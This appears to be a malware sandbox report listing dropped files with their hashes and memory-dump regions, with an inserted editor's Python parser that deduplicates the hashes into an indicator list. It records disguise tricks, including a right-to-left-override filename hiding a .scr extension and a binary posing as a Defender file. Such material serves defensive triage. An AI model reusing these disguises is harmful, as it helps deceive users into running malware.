  MD5: 06ad34f9739c5159b4d92d702545bd49
  SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
  SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
  SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 16KB
  MD5: 9e8cdd5bf35f116ca682855fee2625af
  SHA1: e7439fce325d4c263dc0828462ce64268910cb2f
  SHA256: 3912ec4802fd1db487747a871a869b3f7df76cdae82a2685a5f973323caab909
  SHA512: 21b3334e392ad79482bf909c4d64eee665e17db0ec457a67953480a47c2919590d73473d6cf7161b3f0cf7d61e5b17249b3620c25225b28895907aa453063920
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (second capture, different content)
  Filesize: 1KB
  MD5: bb1c33a1a3bbff8ced39d26308f77211
  SHA1: c59c693e72c74c349b245b33b907dfb4e4ba4c3a
  SHA256: 8685999934d4786f68afbe0f7ceeecd3e308fe8886cd2bc269ba7e3d43bf3c90
  SHA512: 2d07992b52f2826969a4d5549f2812fad0999d9b858ae3e56b3ded04d058dfcada1987ae3b0c2c0cbbfed4a3ac734500a89d8750dd1b85351b6efd05202669b3
- C:\Users\Admin\AppData\Local\Temp\0.exe
  Filesize: 537KB
  MD5: 2ce459cbd15f96b92c6b411b9eaeb24c
  SHA1: d4ef5e179d1e4510141537bd59dca1d6fdb83a6a
  SHA256: bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31
  SHA512: f5385c52c7945cfb2196edbda6aebd7007d383fc837712585c501387704709f9882f36559736b0804455a5c9eb09015d4f6e88135339c340c643554b0d4cb53c
- C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe
  Filesize: 7KB
  MD5: 9b3b4984212489883242d1598db3c1ff
  SHA1: 8791fb96d6237288c8da3118d0d5a41b6499ab93
  SHA256: 1d04094ba1aa6030839a2063d0a367e90c014cf4b76c679ee383de44c9283536
  SHA512: 04dc503ca64aec47e7c9e18d623b1d812e8486d8ef7cd78eefc5c84ae59f75e25fbd286bbf1365a7fa8318e38bd09a2c3c53aa21c9afd557633e47921c642ade
- C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe
  Filesize: 7KB
  MD5: 5d9fea16ab0d9224b54d72e2321bcaff
  SHA1: 499d709c1cbc22caf4e5efda230fb4a158714ea4
  SHA256: dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06
  SHA512: c685ad6526099d126a47528e5230924fdf0762d2b35a0ca73afc1851ec6b4cbb931c08fcd3e419348a10365b04bb44b5561e0f191e4b4793433fd64e118049b4
- C:\Users\Admin\AppData\Local\Temp\auyghobjypbaufjnxqsmc
  Filesize: 4KB
  MD5: 30177e1276595fd69ea96b692f49d776
  SHA1: 75769c29031ca1ad8e175dd700c74b5e35c5b0c7
  SHA256: 76d4066990e2ee2776f733a25ce23e9af545fd6f1a3b5760d603bdc05d9402d5
  SHA512: ccdf20174d299de8ec21445faaf4ebe95c04bd7634c9fe138ba54262b754620c2dfd53a5c94b7d53518181d2eab7b5c97d7933d3a66d05220b06aee120893d4b
- C:\Users\Admin\AppData\Local\Temp\beujeu.oxz
  Filesize: 7KB
  MD5: 8317da4368f4ddeaeb4a823bd6dcd2c6
  SHA1: 54bf3c7d10b630a98cbbb9ede8342a502559e477
  SHA256: fc5c555c516dfe2057eddbff5055d837be131707566b2879e23c99d3a4b909fd
  SHA512: cf1f99ba9eb36e5d9e6825c1453be765ae56eddc441a7b75ade77eecdf0d9534e666265fa75b806c50be0eb32648761e8d759c97e2b20ccd1ce67b594e2b1148
- C:\Users\Admin\AppData\Local\Temp\dxlnbanzq.e
  Filesize: 185KB
  MD5: f6710918e3ecdba55aa451fb1b08742d
  SHA1: 4ef0c29c55d0d532ceb1a5a324b62ff98d08dd70
  SHA256: cc573825aba59339f11629b7fe1ed9adf098e5f12004f441948fe45fcc12a5a7
  SHA512: fc35b518211c758cc7f00820a6dd8d5b8543b5e069cb3f837859b98c40027256c11459dfff85dde653a1137cd20c3e5a6bc1cfd3f7b82a094fe94e16d549a4f2
- C:\Users\Admin\AppData\Local\Temp\enqnjvfa.exe
  Filesize: 11KB
  MD5: 9e64e8dc3ad7ee7d625dcfce59356299
  SHA1: f16c2f1126de4a1c350a00f9e485c27d578a7dbe
  SHA256: a5579131c47b3270af6361bda4c722a9478164f57852a752d602cdf92ff85661
  SHA512: 9e9905e1f5d950ac6867990575e33c0bb4f49d9c5c84122a7affd3228e6df0629502f054c1e32a4062f88a6ce0bd4fc0e4ed6c473f2a0f1fb28329704d4ce56f
- C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe
  Filesize: 6KB
  MD5: 6645e5ca45fe6a10f0b8074e6eb9446d
  SHA1: 55f764b18942e6ec6ae6c8b98cf2cf465cec3d28
  SHA256: c4a7879913019bb57160451e088ea2cd02386406204af973201ce7ac507c186c
  SHA512: 75310173106c1be9adbd374de49408d96dd024fd7c853195f35bfe8bbf4cf12c0b2be2af3c388dfe35c1f083140a1716b1221772911a2af69cc7166be19163d0
- C:\Users\Admin\AppData\Local\Temp\kddzn.ful
  Filesize: 98KB
  MD5: 8b00af25e4733d969d9e2432fc68f7db
  SHA1: 650ec312df2efef2a0795f2b107e71b38758eec0
  SHA256: 5b5ad23fde48eefa5e559987f77a6277f529aa770e2e4fe57ac9873786eb8343
  SHA512: e051c5eecebd037cb6e866969c6302a5467daefdaa0f6e81ff7e37085348f6424f6f733fc1e0a4519b56b8a27b7adf537e26e38de13cc5e06417fcec34d19c22
- C:\Users\Admin\AppData\Local\Temp\rjyyjwcs.j
  Filesize: 5KB
  MD5: 45cbfd24b9943772008f524a20e0a56f
  SHA1: b4b00712aa448298ed165890245d8c916d2d0f64
  SHA256: afef884e713661b15d8639ac7268b667742ebe67b0e031e7d617f2dd2d5813ff
  SHA512: 4f01cb3c9eb01dcd9e359322605d88e1c0d4b1dde3ecabc594dcb7ab44b6e937880c13cf595cff506df317cb7c928c2d30ebfb3249548ff3832c19a802e07f0d
- C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe
  Filesize: 6KB
  MD5: 43092801b433d21c31682428366f4e4c
  SHA1: 2935b85e09a0f78224755a6ebd443cf067705ade
  SHA256: 9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea
  SHA512: 680a7ab8d7f5ed6222451ed50806040b3ad1454d4d4aa737ff205614277cb57b294c707148fbb6aa4cd68d5ceb48454d3d9396fa795da29469692e3bb7eab873
- C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe
  Filesize: 6KB
  MD5: aacae33f1697d56d6ebbe91f49426380
  SHA1: 043d947a5ba9db57da8804ee1b3db6411c36a317
  SHA256: e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081
  SHA512: a150a3f35b00e7553d5aabb6e524cd0770d10714cd255665f4355f9922b91d400d2d2c0c276b18dba2bd999da210a4538754da9f38b819d2a2b3c947a75f6c20
- C:\Users\Admin\AppData\Local\Temp\veakhnr.uza
  Filesize: 185KB
  MD5: 20d3e568432fdba197900c448b7410cb
  SHA1: 59758fbccb9618885923f383691d70893afeb1a5
  SHA256: ba809e6eee1842a5c2cb86535ec45288cf1a4f69f5670cc8965ff8ba0c3dcfab
  SHA512: 37841f6af2308c4b098995a176e294f6cc754c39a45b843c12c36aa663092e5717ea993496bda44385d8d375345a7f4ff8a62f4225830740c2c7a17cbfbacff3
- C:\Users\Admin\AppData\Local\Temp\xofvp.izm
  Filesize: 5KB
  MD5: 2b361c115ca3188f48dbb31359d8fee7
  SHA1: c96e14eb1995e0c9f08e91998c843e9afb12cfc7
  SHA256: 65aa94ff37667b39a15375ae2dc697f4f5979d4c495e0785cfb972f667129bc9
  SHA512: ce60bf5d2069d3e6c5808a9cda2f6b7cfc04e9513a0da7da80b5cec10585fbbe3bfe1ddbe5784ff046a9ecbdf78910663b121b2a66c328f6e7412d0bfbdd5e04
- C:\Users\Admin\AppData\Local\Temp\ycayuhnew.exe
  Filesize: 11KB
  MD5: d3749f4e6710b8d5beb987f07a5e8580
  SHA1: 17d39d416576972ecdf7deb2dce4275941497a29
  SHA256: edfa8cf65bbe6a0ad70cfc86a451b4ac86d034efc77f4e117151faa48af2d73f
  SHA512: 6c53523743ddec06f36fe941180c755a3d32c6c6fe85fe15fa7b159ded7d3d32202b6dd4e58f470e567feeac5ab46f3c6cc09a5d57a4b307baf786aa0365c5cd
- C:\Users\Admin\AppData\Local\Temp\zgoqp.exe (same content as C:\Users\Admin\AppData\Roaming\tdvtqndxxhl\kiflb.exe below)
  Filesize: 11KB
  MD5: fbb51e866cc83f4d5c255d5c6494ac99
  SHA1: cc47711c195bb171427ab1df5f4087dfd85eeeb9
  SHA256: 022aeb46cbf0fb7d446f7846a8b2ea3684d62de7b7068f695a43428e410d6c07
  SHA512: 6298c0870e21cb6f848bdc06a22a20e1424907e41e26e3f97b62cb5f5a25a15f468000daf3741d7e6fbf7315efa3b32f69886ea37068b9f3260317d54e47dada
- C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
  Filesize: 532KB
  MD5: 84e6aa267c6970d2d777d60840390102
  SHA1: c97e555e98c5bec69bcad9607cf0153ff827a141
  SHA256: 69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c
  SHA512: 47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kniemwbpljw\Piutmyre.exe (same content as C:\Users\Admin\Downloads\vbc(2).exe below)
  Filesize: 2.3MB
  MD5: a55643dbed66c798227d37d5d67df6e4
  SHA1: 0b12dbf8812476b60b5ccfa0c205de57271ed015
  SHA256: 202f33d58a0f7ad48695fdf718cfd5cb8a93cf9d1c410e7a6cac51ad0407a6b0
  SHA512: 48af1619628ce69855010b4bb443c0ef83b122defb9a8ce283983f5bec54590202dab34c656421e08ead89dd855faadae2967e264af50d0ce7537946354a3d61
- C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe (same content as C:\Users\Admin\Downloads\vbc.exe and vbc(1).exe below)
  Filesize: 1.3MB
  MD5: e3a9c34f3c2d41a8edff46c006bb8bde
  SHA1: fdf8be49b6ebceaf143fd074db15baf8c339e89d
  SHA256: a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
  SHA512: 10f275dd39a19a227dbbdbbe5d504dfae7cb9ed8c7638d67dcad0db8c985a00e89409f854f1cfaabd07a3cad8fc3d8ce834d3623f688c3f7dd2b10592e655889
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\cookies.sqlite
  Filesize: 512KB
  MD5: 425ad291866528bb4433d8c1ba0ac361
  SHA1: 5b594072607c36485f8bdc7503632dd75a8f3701
  SHA256: 77c2ad864dcd158f8becb14c54dd9ffb9d41633f976f4d9de0d4fff1dac9bde9
  SHA512: bb30a9940299c3563deb49a8e9532b48d425ecc4344f00aca1921748405858bc57bb893d7b2de0f6af072ebd2cb63443eb477505f528715b82b8eeb16d9f4bf1
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\places.sqlite (first capture)
  Filesize: 5.0MB
  MD5: 72c14142f3a23cad92dbffe6fe3d4b1b
  SHA1: 8c536fe860acb1346dbe73359506e2a1faeebeb8
  SHA256: 6556b3c515c2486c29bda5e3936657e68f2ff830d5584b0d6037bc4ccf3a8d24
  SHA512: b8612ef3cf2c8b2e82f721cd5bf5d3efd7e21947584953ef6b951427f915db860a1a82297daffc13968e85712af35f38e82a21c957f8cb450f2b3681fbefc966
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\places.sqlite (second capture, different content)
  Filesize: 5.0MB
  MD5: 72c14d9ecb6ca38a226c18645c496fe0
  SHA1: c54c98db81a578db0f91b13a0a44eaafb4c45713
  SHA256: 9769412d349283e4ddc12c29f2a5466ee2935ca29d27a468df6578034d76ccdb
  SHA512: 15c108811039d0dbd9f0eb9796340b0b4153c753def2933c9bd69013cdaed600f614d8d8adfe3318eb6adbd8117b78e5e62f17677bb552aae24a45cefb9c7672
- C:\Users\Admin\AppData\Roaming\tdvtqndxxhl\kiflb.exe (same content as C:\Users\Admin\AppData\Local\Temp\zgoqp.exe above)
  Filesize: 11KB
  MD5: fbb51e866cc83f4d5c255d5c6494ac99
  SHA1: cc47711c195bb171427ab1df5f4087dfd85eeeb9
  SHA256: 022aeb46cbf0fb7d446f7846a8b2ea3684d62de7b7068f695a43428e410d6c07
  SHA512: 6298c0870e21cb6f848bdc06a22a20e1424907e41e26e3f97b62cb5f5a25a15f468000daf3741d7e6fbf7315efa3b32f69886ea37068b9f3260317d54e47dada
- C:\Users\Admin\Downloads\RustExternal%u202Enls..scr (the %u202E in the name is the escaped U+202E RIGHT-TO-LEFT OVERRIDE character, which makes the ".scr" extension display reversed in file listings)
  Filesize: 658KB
  MD5: 1ab8dbca5e2bba39723f00907d266de7
  SHA1: 729cb808637568f20ac886b3fac5f3cf5ff01dee
  SHA256: c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac
  SHA512: d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081
- C:\Users\Admin\Downloads\alaat2.1.exe
  Filesize: 413KB
  MD5: a2b43ba6d6a6af9f0fa07cab1a1ffd64
  SHA1: 0d63ee2545439dff61486e040fb8d921bee79ae3
  SHA256: 9a67166c5a81302300022d5fcf029600356460fcf3ce82fa37db08b131a0459f
  SHA512: 2a1105023880ae650ba67f2d657f3c0fe8c1a84c40a5a9ac5303f0c666226c454c40893f79073e816d14d873a3b583803934f9540a9ee7a604318affb1b427bb
- C:\Users\Admin\Downloads\build.exe
  Filesize: 291KB
  MD5: 8b2af24de5814668562cc1f27fd26ad0
  SHA1: cbe6cf1f151ce5e7d24bd0f773a229a447b9a658
  SHA256: b7bbac182f944d86b63f6a3ba9afe9c62a8195a8977c64802bea8042d6173186
  SHA512: 9643e8296fa7906882c29e03fd6808347bb12af04257e0a28e1bf9eb88de4a3efa3da0ab709322bbfc1577eebb7149d20bf420b2579834ccb75ceec8473c0f84
- C:\Users\Admin\Downloads\jeymo2.1.exe
  Filesize: 413KB
  MD5: d852dc6cd5735e9be663c145356878c5
  SHA1: 122bfaa3e35ab60f0d079c947c6df7cad0bd9cef
  SHA256: 9cb663413d7bc88e4260e2fa57a565227a9dab828345a8bc6d5c65694dfc455e
  SHA512: 58f715a85ca601bc366142df5418d8af195300e1825baa5209b173e75c55f9328b71573e5fe21f78cffcc2837b3d62d31800443de100b0ad503864c450f38da1
- C:\Users\Admin\Downloads\makanaki.exe
  Filesize: 326KB
  MD5: db11e583944ddefc276fd302c0eecf39
  SHA1: 662c88e0753e7d006ab7cc43297613a7cb5d811d
  SHA256: 80e28fcc8b571c2c8fe075896d03ed473e825bb56296563f3d5dffaa22fe0ccb
  SHA512: b58c03d09490ae7a66b9a40c5bb92b5636144b727e1e0bb4947a9f2894dc65cbb95f15f960bc0f1078833efdaf345de7f9a0894cd139cf783d34e368cb2e1dcf
- C:\Users\Admin\Downloads\newversion2.exe
  Filesize: 175KB
  MD5: 7e2f00faa3d8e240e551878f8176a48e
  SHA1: 6c65122b1c6496444b056144a5923d49fd58fbb6
  SHA256: 33582086a3417a06bb5154cd9e1f878bff0d8717151cbccd539cd0505a8e5fcd
  SHA512: 1936d87448f7576b17839ed7bb4a63f2021c52c23d0cce010325beeacea01e696140a247d6208810c765a993dac375906e0c5b7d2c457ac13c30f64644fcffa7
- C:\Users\Admin\Downloads\vbc(1).exe (same content as vbc.exe and C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe)
  Filesize: 1.3MB
  MD5: e3a9c34f3c2d41a8edff46c006bb8bde
  SHA1: fdf8be49b6ebceaf143fd074db15baf8c339e89d
  SHA256: a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
  SHA512: 10f275dd39a19a227dbbdbbe5d504dfae7cb9ed8c7638d67dcad0db8c985a00e89409f854f1cfaabd07a3cad8fc3d8ce834d3623f688c3f7dd2b10592e655889
- C:\Users\Admin\Downloads\vbc(2).exe (same content as C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kniemwbpljw\Piutmyre.exe)
  Filesize: 2.3MB
  MD5: a55643dbed66c798227d37d5d67df6e4
  SHA1: 0b12dbf8812476b60b5ccfa0c205de57271ed015
  SHA256: 202f33d58a0f7ad48695fdf718cfd5cb8a93cf9d1c410e7a6cac51ad0407a6b0
  SHA512: 48af1619628ce69855010b4bb443c0ef83b122defb9a8ce283983f5bec54590202dab34c656421e08ead89dd855faadae2967e264af50d0ce7537946354a3d61
- C:\Users\Admin\Downloads\vbc.exe (same content as vbc(1).exe and C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe)
  Filesize: 1.3MB
  MD5: e3a9c34f3c2d41a8edff46c006bb8bde
  SHA1: fdf8be49b6ebceaf143fd074db15baf8c339e89d
  SHA256: a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
  SHA512: 10f275dd39a19a227dbbdbbe5d504dfae7cb9ed8c7638d67dcad0db8c985a00e89409f854f1cfaabd07a3cad8fc3d8ce834d3623f688c3f7dd2b10592e655889
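The Downloads listing above lists several entries twice verbatim and lists the same content under different names: vbc.exe, vbc(1).exe and Miriuk\Miruik.exe share one SHA256, vbc(2).exe and Piutmyre.exe share another, and places.sqlite appears twice with different hashes because two different versions of that file were captured. The following is an added example, editor's code and not part of the sandbox report: a parser for the listing in the fused form the extraction produced (path and the word Filesize on one line, size on the next, then MD5/SHA1/SHA256/SHA512 each glued to its label), which validates digest lengths, collapses the entries by SHA256 so an IOC list names each distinct file once, and reports which dropped names are copies of one another. The excerpt it runs on is constructed from the entries above; the SHA1 and SHA512 lines were left out of it for brevity, and the parser accepts any of the four digests.

```python
"""Collapse a sandbox 'Downloads' listing into one record per distinct file."""
import re
from collections import defaultdict

# Constructed excerpt of the Downloads listing above, in the fused form the
# extraction produced. SHA1/SHA512 lines of the real entries are omitted here;
# "-" separator lines between entries are skipped by the parser.
SAMPLE = r"""
-
C:\Users\Admin\Downloads\vbc.exeFilesize
1.3MB
MD5e3a9c34f3c2d41a8edff46c006bb8bde
SHA256a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
-
C:\Users\Admin\Downloads\vbc(1).exeFilesize
1.3MB
MD5e3a9c34f3c2d41a8edff46c006bb8bde
SHA256a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exeFilesize
1.3MB
MD5e3a9c34f3c2d41a8edff46c006bb8bde
SHA256a4b167bf02353592347c3bbbd0deeb54cce5178918ca6a1e7bf49bffffa85123
C:\Users\Admin\Downloads\vbc(2).exeFilesize
2.3MB
MD5a55643dbed66c798227d37d5d67df6e4
SHA256202f33d58a0f7ad48695fdf718cfd5cb8a93cf9d1c410e7a6cac51ad0407a6b0
C:\Users\Admin\Downloads\vbc(2).exeFilesize
2.3MB
MD5a55643dbed66c798227d37d5d67df6e4
SHA256202f33d58a0f7ad48695fdf718cfd5cb8a93cf9d1c410e7a6cac51ad0407a6b0
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kniemwbpljw\Piutmyre.exeFilesize
2.3MB
MD5a55643dbed66c798227d37d5d67df6e4
SHA256202f33d58a0f7ad48695fdf718cfd5cb8a93cf9d1c410e7a6cac51ad0407a6b0
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\places.sqliteFilesize
5.0MB
MD572c14142f3a23cad92dbffe6fe3d4b1b
SHA2566556b3c515c2486c29bda5e3936657e68f2ff830d5584b0d6037bc4ccf3a8d24
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vybwayxr.default-release\places.sqliteFilesize
5.0MB
MD572c14d9ecb6ca38a226c18645c496fe0
SHA2569769412d349283e4ddc12c29f2a5466ee2935ca29d27a468df6578034d76ccdb
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_downloads(text):
    """Turn the fused 'PathFilesize / size / MD5... / SHA...' lines into dicts."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Filesize"):
            current = {"path": line[: -len("Filesize")], "size": None}
            entries.append(current)
        elif not line or line == "-" or current is None:
            continue
        elif current["size"] is None:
            current["size"] = line
        else:
            m = HASH_RE.match(line)
            if not m:
                raise ValueError(f"unexpected line {line!r} under {current['path']}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != DIGEST_LEN[algo]:  # catch truncated or mis-split digests
                raise ValueError(f"{algo} digest has wrong length for {current['path']}")
            current[algo] = digest
    return entries


def group_by_content(entries):
    """One record per distinct SHA256, listing every path that carried those bytes."""
    groups = defaultdict(lambda: {"size": None, "md5": None, "paths": set()})
    for e in entries:
        g = groups[e["SHA256"]]
        g["size"], g["md5"] = e["size"], e.get("MD5")
        g["paths"].add(e["path"])
    return {sha: {**g, "paths": sorted(g["paths"])} for sha, g in groups.items()}


def renamed_copies(groups):
    """SHA256 values seen under more than one path (drop-and-copy chains)."""
    return {sha: g["paths"] for sha, g in groups.items() if len(g["paths"]) > 1}


def same_path_different_content(entries):
    """Paths listed with more than one SHA256 (the file changed during the run)."""
    seen = defaultdict(set)
    for e in entries:
        seen[e["path"]].add(e["SHA256"])
    return {p: sorted(s) for p, s in seen.items() if len(s) > 1}


if __name__ == "__main__":
    found = parse_downloads(SAMPLE)
    for sha, paths in renamed_copies(group_by_content(found)).items():
        print(sha, "->", paths)
    print(same_path_different_content(found))
```

The length check matters when feeding a scraped page: a digest line split or truncated by the extraction would otherwise be stored as a valid-looking but wrong IOC. Keying on SHA256 rather than on the path is what turns the listing into a usable blocklist; the path-to-path copy map it yields is the same drop-and-copy relationship a triage note would state in prose.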
- memory/380-286-0x0000000000000000-mapping.dmp
- memory/380-287-0x0000000000400000-0x0000000000424000-memory.dmp (144KB)
- memory/388-147-0x0000000000000000-mapping.dmp
- memory/424-178-0x0000000000000000-mapping.dmp
- memory/424-182-0x0000000060900000-0x0000000060992000-memory.dmp (584KB)
- memory/444-343-0x0000000000000000-mapping.dmp
- memory/524-215-0x00000000006D0000-0x00000000006E4000-memory.dmp (80KB)
- memory/524-214-0x0000000000C20000-0x0000000000F6A000-memory.dmp (3.3MB)
- memory/524-212-0x0000000000000000-mapping.dmp
- memory/544-317-0x0000000000000000-mapping.dmp
- memory/988-357-0x0000000000000000-mapping.dmp
- memory/1084-311-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp (1.4MB)
- memory/1084-304-0x0000000000000000-mapping.dmp
- memory/1084-308-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp (1.4MB)
- memory/1120-265-0x0000000000000000-mapping.dmp
- memory/1232-312-0x0000000000000000-mapping.dmp
- memory/1232-271-0x0000000000000000-mapping.dmp
- memory/1232-315-0x00007FF7BCCB0000-0x00007FF7BCE13000-memory.dmp (1.4MB)
- memory/1372-156-0x0000000000000000-mapping.dmp
- memory/1416-330-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/1416-325-0x0000000000720000-0x0000000000728000-memory.dmp (32KB)
- memory/1416-321-0x0000000000000000-mapping.dmp
- memory/1432-289-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/1432-274-0x0000000140000000-0x000000014007C000-memory.dmp (496KB)
- memory/1432-275-0x0000000140000000-mapping.dmp
- memory/1432-277-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/1532-290-0x0000000000400000-0x0000000000478000-memory.dmp (480KB)
- memory/1532-293-0x0000000000400000-0x0000000000478000-memory.dmp (480KB)
- memory/1532-284-0x0000000000000000-mapping.dmp
- memory/1748-207-0x0000000000000000-mapping.dmp
- memory/1848-221-0x00000000001E0000-0x00000000001EC000-memory.dmp (48KB)
- memory/1848-220-0x0000000000000000-mapping.dmp
- memory/1848-222-0x0000000000480000-0x00000000004AF000-memory.dmp (188KB)
- memory/1848-223-0x0000000000480000-0x00000000004AF000-memory.dmp (188KB)
- memory/2172-233-0x00000000054C0000-0x00000000054E2000-memory.dmp (136KB)
- memory/2172-230-0x0000000000000000-mapping.dmp
- memory/2172-232-0x0000000000650000-0x00000000008A8000-memory.dmp (2.3MB)
- memory/2312-170-0x0000000005560000-0x0000000005B04000-memory.dmp (5.6MB)
- memory/2312-173-0x0000000006620000-0x000000000662A000-memory.dmp (40KB)
- memory/2312-169-0x0000000000A70000-0x0000000000BD0000-memory.dmp (1.4MB)
- memory/2312-171-0x0000000005050000-0x00000000050E2000-memory.dmp (584KB)
- memory/2312-166-0x0000000000000000-mapping.dmp
- memory/2312-172-0x00000000050F0000-0x000000000518C000-memory.dmp (624KB)
- memory/2404-217-0x0000000000000000-mapping.dmp
- memory/2428-174-0x0000000000000000-mapping.dmp
- memory/2484-283-0x0000000000000000-mapping.dmp
- memory/2560-176-0x0000000000400000-0x000000000041D000-memory.dmp (116KB)
- memory/2560-163-0x0000000000000000-mapping.dmp
- memory/2560-168-0x0000000000400000-0x000000000041D000-memory.dmp (116KB)
- memory/2576-328-0x0000000000000000-mapping.dmp
- memory/2716-329-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmp (10.8MB)
- memory/2716-318-0x0000000000000000-mapping.dmp
- memory/2716-322-0x0000000000450000-0x0000000000458000-memory.dmp (32KB)
- memory/2888-327-0x0000000000000000-mapping.dmp
- memory/2920-205-0x0000000000000000-mapping.dmp
- memory/2920-228-0x0000000000000000-mapping.dmp
- memory/3012-337-0x0000000000000000-mapping.dmp
- memory/3064-216-0x0000000008010000-0x00000000080CD000-memory.dmp (756KB)
- memory/3064-144-0x000000000A120000-0x000000000A271000-memory.dmp (1.3MB)
- memory/3064-153-0x000000000ACC0000-0x000000000AE18000-memory.dmp (1.3MB)
- memory/3064-154-0x000000000ACC0000-0x000000000AE18000-memory.dmp (1.3MB)
- memory/3280-340-0x0000000000000000-mapping.dmp
- memory/3376-298-0x0000000000D30000-0x0000000000DDA000-memory.dmp (680KB)
- memory/3376-296-0x0000000000000000-mapping.dmp
- memory/3456-350-0x0000000000000000-mapping.dmp
- memory/3476-285-0x0000000000000000-mapping.dmp
- memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmp (348KB)
- memory/3508-181-0x0000000000000000-mapping.dmp
- memory/3676-355-0x0000000000000000-mapping.dmp
- memory/3872-158-0x0000000000000000-mapping.dmp
- memory/3896-254-0x0000000000000000-mapping.dmp
- memory/3896-258-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/3896-260-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/3896-255-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/3896-257-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/3896-267-0x0000000000400000-0x000000000047F000-memory.dmp (508KB)
- memory/3960-139-0x0000000000000000-mapping.dmp
- memory/3960-146-0x0000000000400000-0x000000000042F000-memory.dmp (188KB)
- memory/3960-143-0x0000000001340000-0x0000000001355000-memory.dmp (84KB)
- memory/3960-142-0x00000000017E0000-0x0000000001B2A000-memory.dmp (3.3MB)
- memory/3960-141-0x0000000000400000-0x000000000042F000-memory.dmp (188KB)
- memory/3964-242-0x0000000000000000-mapping.dmp
- memory/3964-134-0x0000000000000000-mapping.dmp
- memory/3972-332-0x0000000000000000-mapping.dmp
- memory/4024-326-0x0000000000000000-mapping.dmp
- memory/4092-239-0x0000000005F70000-0x0000000005F8E000-memory.dmp (120KB)
- memory/4092-241-0x0000000006470000-0x000000000648A000-memory.dmp (104KB)
- memory/4092-236-0x00000000050D0000-0x00000000056F8000-memory.dmp (6.2MB)
- memory/4092-237-0x0000000005870000-0x00000000058D6000-memory.dmp (408KB)
- memory/4092-238-0x0000000005950000-0x00000000059B6000-memory.dmp (408KB)
- memory/4092-234-0x0000000000000000-mapping.dmp
- memory/4092-219-0x0000000000000000-mapping.dmp
- memory/4092-240-0x00000000075B0000-0x0000000007C2A000-memory.dmp (6.5MB)
- memory/4092-235-0x00000000049B0000-0x00000000049E6000-memory.dmp (216KB)
- memory/4192-331-0x0000000000000000-mapping.dmp
- memory/4192-336-0x0000000000800000-0x0000000000808000-memory.dmp (32KB)
- memory/4276-358-0x0000000000000000-mapping.dmp
- memory/4332-243-0x0000000000000000-mapping.dmp
- memory/4336-268-0x00000280FC7A0000-0x00000280FD261000-memory.dmp (10.8MB)
- memory/4336-273-0x00000280FC7A0000-0x00000280FD261000-memory.dmp (10.8MB)
- memory/4336-264-0x00000280FC7A0000-0x00000280FD261000-memory.dmp (10.8MB)
- memory/4336-261-0x0000000000000000-mapping.dmp
- memory/4388-348-0x0000000000000000-mapping.dmp
